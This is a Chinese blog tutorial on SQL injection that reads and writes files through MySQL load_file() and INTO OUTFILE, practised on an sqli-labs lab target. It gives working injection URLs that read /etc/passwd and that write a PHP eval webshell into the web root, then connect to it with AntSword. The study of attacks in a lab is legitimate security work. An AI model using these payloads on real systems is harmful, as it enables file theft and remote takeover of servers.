4 读写文件_WEB安全之SQL注入(4)——读写文件

最新推荐文章于 2022-11-25 18:34:15 发布
最新推荐文章于 2022-11-25 18:34:15 发布
阅读量97 收藏
点赞数
文章标签: 4 读写文件
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_28787725/article/details/112663671
版权

大家好,我是阿里斯,一名IT行业小白。今天为大家分享的内容是利用注入进行文件的读写,这里主要是两个函数,load_file() 和into outfile 希望能帮助小白,也能帮助已经遗忘的你。

load_file()和into outfile使用前提

  • 有读/写权限

  • 有绝对路径

  • secure_file_priv 的值不为null

  • 注入时需要能够使用select语句

  • 引号能否使用

数据库测试

使用load_file读取D盘的3.txt文件

0cda08336867269ee1f4a607c3aaf91a.png

使用into outfile 写入文件4.txt到D盘

3dbab59f7f31634ac725ecc0e1d911c9.png

那么为什么我能使用这俩个函数呢?因为我在配置文件中设置了secure_file_priv ,如果你想在本地测试,加入该选项后注意重启mysql服务

ff4a66eddb7eff7d430941aa05c9e49e.png

线上靶机测试

load_file()

测试注入点 | 经过测试存在字符型注入

http://www.anantest.com:8080/sqlilabs/Less-1/?id=1' and 1=1--+

判断查询字段数

http://www.anantest.com:8080/sqlilabs/Less-1/?id=1' order by 3 --+

09a8cb73c1a8113fa5f802ed87342a16.png

判断显示位

http://www.anantest.com:8080/sqlilabs/Less-1/?id=-1' union select 1,2,3 --+

dd2a127df5ef4c1b784ec2ea00a808e4.png

进行文件读取 

因为系统时centos,所以可以试试/etc/passwd文件,成功读取到配置文件

http://www.anantest.com:8080/sqlilabs/Less-1/?id=-1' union select 1,load_file('/etc/passwd'),3 --+

2e0d6692abdb804fb77cc1c102fe3e8a.png

into ouftile写内容

直接利用上面测试的结果使用into outfile进行测试

第一次写入时,页面会回显错误,其实已经写入成功,可以使用菜刀或者蚁剑连接一下试试

http://www.anantest.com:8080/sqlilabs/Less-1/?id=-1' union select 1,('<?php  @eval($_REQUEST["hack"])?>'),3  into outfile "/var/www/html/ma.php"--+

蚁剑连接刚刚写入的一句话木马

f7805c6cd9d2b3001f106cf1a096cd9d.png

成功控制测试机

0f8e249455dd6597f620f6a481efb21a.png

e805c87537ea39f778e1930a80282953.png

有见Finsight
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
第四天sql load_file&报错注入简单用法
代码审计
03-05 2416
1. sql注入 使用的前提: a) 需要一个可控的参数点 b) 需要无过滤或者是过滤不充分 插入的payload被数据库执行 分类: 按照注入的数据类型: a) 整数型 不需要闭合单双引号 b) 字符型 需要闭合单双引号 按照注入的方式: a) 联合查询注入 b) 报错注入 c) 基于bool的注入 d) 基于时间的注入 e) 堆叠注入 如何快速判断是否存在sql注入? 1.使用单双引号 看是否报错 2.使用四则运算 看是否是整数型 3. 使用bool判断 and 1=1
SQL注入全面讲解技术文档
03-31
SQL注入漏洞全接触 注入是常见的利用程序漏洞进行攻击的方法,是很多入门级"黑客"喜欢采用的攻击方式,近来网上对它的讨论很热烈,所以我在本期专题中为读者揭示SQL攻击的主要原理以及如何防范这种攻击。 全文分为十三章全面的分析sql注入,使您学习的好助手。 目录 1.SQL注入漏洞全接触--入门篇 1 2.SQL注入法攻击一日通 8 3.SQL Server应用程序中的 高级SQL注入 19 4.编写通用的ASP防SQL注入攻击程序 22 5.利用instr()函数防止SQL注入攻击 23 6.跨站式SQL注入技巧 25 7. 防范Sql注入式攻击 27 8.PHP与SQL注入攻击 29 9.SQL注入攻击零距离 30 10.SQL注入技术和跨站脚本攻击的检测 34 11.菜鸟入门级:SQL注入攻击 39 12. SQL注入渗透某网络安全公司的网站全过程 42 13.利用SQL注入2分钟入侵网站全程实录 45
sql注入之into outfile
ljj20020718的博客
11-25 2443
sql注入之into outfile
SQL注入文件写入(需要用户验证)
热门推荐
隐0士的博客
11-14 1万+
SQL注入文件写入(需要用户验证)解决方案说明 这个问题根据使用的数据库而有两种处理方案:数据库不为sqlserver 此问题是针对sql server数据库做文件写入的攻击而产生的,如果使用的数据库不是sql server则可不必理会,可在appscan的扫描配置–>测试策略–>SQL注入–>SQL注入文件写入(需要用户验证)两个选项前面去掉打勾,这样appscan便不会做这样的扫描攻击,如下
SQL注入
bossDDYY的博客
09-20 1403
sql注入
PHP文件数据类网站实例开发源码——和其MySQL备份.rar
10-24
在实际的网站开发中,还需要考虑安全性问题,如防止SQL注入,这可以通过预处理语句或者使用PDO(PHP Data Objects)扩展来实现。另外,为了优化性能,需要了解索引的创建和使用,以及适当的数据库设计原则。 对于...
基于ASP.NET的停车场管理系统_WEB管理系统_SQLServer数据库应用.rar
04-26
此外,系统还可能涉及安全性方面的考虑,如用户身份验证和授权,防止SQL注入攻击,以及数据加密等措施,确保用户信息的安全。同时,为了提高系统的可扩展性和维护性,可能会采用MVC(Model-View-Controller)架构,...
ASP.NET实例开发源码——HTTPCommander网文件经理源码.zip
11-24
4. **文件系统访问**:学习如何使用C#的System.IO命名空间来安全读写、操作文件和目录,以及如何实现文件上传和下载功能。 5. **用户认证与授权**:HTTPCommander可能包含用户登录和权限管理功能,这涉及ASP.NET...
PHP文件数据类网站实例开发源码——文件管理器(PHP).zip
10-24
- 文件管理器需要防止常见的Web攻击,如SQL注入和跨站脚本攻击(XSS)。这可能通过使用预处理语句、过滤用户输入、限制文件类型上传等方式实现。 - 文件路径和命名也需谨慎处理,防止路径遍历漏洞。 7. 用户认证...
PHP实例开发源码——PhpSpy 2008 WEB后门程序.zip
11-22
4. **文件操作**:后门可能涉及读写服务器上的文件,包括日志、配置文件等,因此需要理解PHP的文件I/O函数,如`file_get_contents()`、`file_put_contents()`等。 5. **网络通信**:PhpSpy可能通过网络发送或接收...
mysql 流读取文件_MySQL之文件读取
weixin_34254083的博客
02-07 923
读取服务端文件读取文件利用方式load_file()select load_file('/etc/passwd')load data infile() 利用该函数读文件时需要将文件内容保存至一个表中,在方便查看结果的情况下,一般最好自己创建一个新表来保存查询的结果。-- 创建存储结果的表create table result(cmd text);-- 读取文件内容到表中load data infi...
Mysql使用load_file出现NULL解决
qq_52344654的博客
12-25 4375
0x00 首先声明采用的Ubuntu与mysql环境为5.7.26-0ubuntu0.16.04.1 0x01 今天在练习AWD加固时,偶然进入mysql后,使用select load_file('/flag');竟然显示NULL,空值。但是当我换成select load_file('/etc/passwd');竟然显示正常,很奇怪的好叭。所以就疯狂百度最终解决了这个问题 0x02 那么首先就需要使用:show variables like '%secure%';。去查看一下secu.
SQL注入漏洞(2)注入方法2之into outfile注入
weixin_51339377的博客
03-18 854
into outfile/load_file name=-1' union select 1,load_file('C:/a.txt') --+ 读取c盘下的a.txt文件 name=-1' union select 1,load_file('C:/a.txt')into outfile 'C:/phpstudy_pro/WWW/pikachu/vul/sqli/haha.txt' --+ 读取c盘的a.txt内容到自己目录下的haha.txt 这个into outfile不具备创建文件的能力...
Sql注入文件读写操作
INK
05-05 993
sql文件读写
SQL注入详解
m0_67391121的博客
07-28 3652
WAF(WebApplicationFirewall)的中文名称叫做“Web应用防火墙”,利用国际上公认的一种说法,WAF的定义是这样的Web应用防火墙是通过执行一系列针对HTTP/HTTPS的安全策略来专门为Web应用提供保护的一款产品。通过从上面对WAF的定义中,我们可以很清晰的了解到,WAF是一种工作在应用层的、通过特定的安全策略来专门为Web应用提供安全防护的产品。...
MySQL 及 SQL 注入
KopWelkin的博客
10-09 276
如果您通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题。 本章节将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL中注入的字符。 所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 我们永远不要信任用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对用户
SQL注入文件读写
永远是少年
06-27 2217
今天继续给大家介绍渗透测试相关知识,本文主要内容是SQL注入文件读写。 一、SQL注入文件读写函数 二、SQL注入文件读写之secure_file_priv参数 三、SQL注入文件路径获取 四、SQL注入文件读写之魔术引导开关......
3-4SQL注入系统交互提权
山兔的博客
02-10 2055
我们本篇文章将讲述,SQL注入中如何与系统层进行交互的,假如,我们在前面的章节中,可以确认用户,能够与系统层进行交互,那与系统层交互就变得相当重要 1.与系统层交互的方式 因为一旦能够与系统层交互,那就能够 1.读和写磁盘文件 甚至能够以管理员的权限 2.直接执行系统层的命令 这就意味着,系统可能被控制的风险 读和写磁盘文件的方式,因为可能有所限制,但是随着工具的使用,可能最终会得到系统层的权限 第二种,可能与系统层的管理员权限来运行的程序,直接就可以执行命令,这种方式,也相当于得到了系统层的控制权 SQL
SQL注入-Mysql注入读写文件
qq_25899635的博客
05-22 7034
Mysql注入文件 mysql数据库在渗透测试过程中能够使用的功能还是比较多的,出了读取数据之外,还可以进行读写(但前提是权限足够)。 读文件前提: 1、用户权限足够高,尽量具有root权限。 2、secure_file_priv不为NULL Mysql文件读写函数 举例:select load_file(’/etc/hosts’) 上面的例子是有条件限制的: 1、必须有权限读取并且文件必须完...
python获取文件读写位置_python学习——文件读写
最新发布
05-31
你可以使用文件对象的tell()方法获取文件读写位置,该方法返回当前文件指针的位置(也就是当前读取或写入位置)。 例如,以下代码打开一个文件并读取其中的一行,然后使用tell()方法获取当前读取位置: ``` with ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值